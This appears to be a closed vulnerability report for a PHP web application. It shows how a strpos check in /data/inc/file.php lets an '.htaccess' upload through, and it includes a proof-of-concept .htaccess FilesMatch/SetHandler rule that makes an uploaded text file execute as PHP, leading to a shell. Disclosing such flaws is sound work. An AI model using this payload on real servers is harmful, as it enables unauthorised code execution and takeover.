Closed
Description
Vulnerability location:
/data/inc/file.php line:42

If the file name is '.htaccess', the strpos function returns a result of 0.
Demo:
Upload these two files in the management file interface.


Access in /files/1.txt.

Successful execution.
Then upload attack code.


Successfully obtained the shell.
Poc:
.htaccess
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>